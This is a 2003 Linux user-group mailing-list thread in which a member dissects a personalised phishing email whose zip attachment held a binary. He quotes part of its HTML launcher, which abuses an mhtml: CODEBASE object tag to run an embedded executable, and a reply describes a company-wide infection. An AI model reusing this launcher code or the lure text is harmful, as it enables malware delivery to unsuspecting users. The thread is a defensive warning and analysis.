[ale] Interesting trojan attempt?
Debrihmi
debrihmi at chaos706.org
Sun Aug 3 16:44:50 EDT 2003
Yeah it's a pain.. Our company is all MS and we got hit on Friday.. Tell ya something,
when you're in the middle of production the first thing you do is just open your email
so you can read it and get it out of the way.. Needless to say I we had a hell of a time
(1500 + people); they had to shutdown the server just to get a handle on it.. I hope
that tomorrow everything is back to normal..
~
Debrihmi
On Sun, 3 Aug 2003 16:26:55 -0400, David S. Jackson wrote
> This forwarded message came to me from my pop account at
> Earthlink. It has the Subject line:
>
> Subject: [admin at sylvester.dsj.net: your account
> vjovvlov]
>
> It looked kinda clever. I don't think I've seen this before.
> Somehow it snarfed my MX machine's name and stuck it into the
> subject line and into the To:, Reply-To:, and From: address. I
> Almost thought it was real for a second. I shouldn't be allowing
> external queries from my internal DNS server anyway, so I'd
> better make sure that didn't happen.
>
> The attachment was a zip file labelled: message.zip.
>
> When I pipe the "message" to less through unzip -p, I get
> compiled binary output followed by some "launch code" in an html
> file:
>
> <SCRIPT>
> function malware()
> {
> s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
> path=unescape(path);
> document.write(' <title>Message</title><body scroll=no
> bgcolor=white><FONT face=
> "Arial" color=black
> style="position:absolute;top:20;left:90;z-index:100; font-si
> ze:12px;">No message</center><OBJECT style="cursor:cross-hair"
> alt="moo ha ha" C
> LASSID="CLSID:11111111-1111-1111-1111-111111111111"
> CODEBASE="mhtml:'+path+'\\m
> essage.html!File://foo.exe"></OBJECT>')
> }
>
> [ lots more html snipped... ]
>
> Anyway, I guess you guys see this quite a bit, but I hadn't seen
> anything quite so personalized before. (Also, the X-Mailer:
> attribution was kind of obvious. And the timestamp was in PDT.)
>
> ----- Forwarded message from admin at sylvester.dsj.net -----
>
> Received: from localhost (dsj at localhost [127.0.0.1])
> by sylvester.dsj.net (8.12.3/8.12.3/Debian-5) with ESMTP id h7385pXI009561
> for <dsj at localhost>; Sun, 3 Aug 2003 04:38:42 -0400
> Received: from pop.dsj.net [207.217.120.137]
> by localhost with POP3 (fetchmail-5.9.11)
>
> for dsj at localhost (single-drop); Sun, 03 Aug 2003 04:38:42 -0400
> (EDT) Received: from localhost ([211.110.44.18]) by tern (EarthLink
> Mail Service) with SMTP id 19Jdzq2Bj3NZFmh0
> for <dsj at dsj.net>; Sun, 3 Aug 2003 00:46:18 -0700 (PDT) From:
admin at sylvester.dsj.net
> To: Dsj <dsj at dsj.net>
> Reply-To: admin at sylvester.dsj.net
> X-Mailer: The Bat! (v1.61)
> X-Priority: 2 (High)
> Subject: your account vjovvlov
> MIME-Version: 1.0
> Content-Type: multipart/mixed; boundary="----------5B228CBD052294B"
> Message-Id: <200308030046.19Jdzq2Bj3NZFmh0 at tern>
> Date: Sun, 3 Aug 2003 00:46:18 -0700 (PDT)
> Status: RO
> Content-Length: 29765
> Lines: 402
>
> Hello there,
>
> I would like to inform you about important information regarding your
> email address. This email address will be expiring.
> Please read attachment for details.
>
> ---
> Best regards, Administrator
> vjovvlov
>
> ----- End forwarded message -----
>
> --
> David S. Jackson dsj at dsj.net
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> Thank goodness modern convenience is a thing of the
> remote future.
> -- Pogo, by Walt Kelly
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://www.ale.org/mailman/listinfo/ale
~
Debrihmi
--
Member, "Chattahoochee Area Open Source" (http://chaos706.org)
Member, "Atlanta Linux Enthusiasts (ALE)" (http://ale.org)
-=[ Ask me about Linux and be Amazed ]=-
_______________________________________________
Ale mailing list
Ale at ale.org
http://www.ale.org/mailman/listinfo/ale
More information about the Ale
mailing list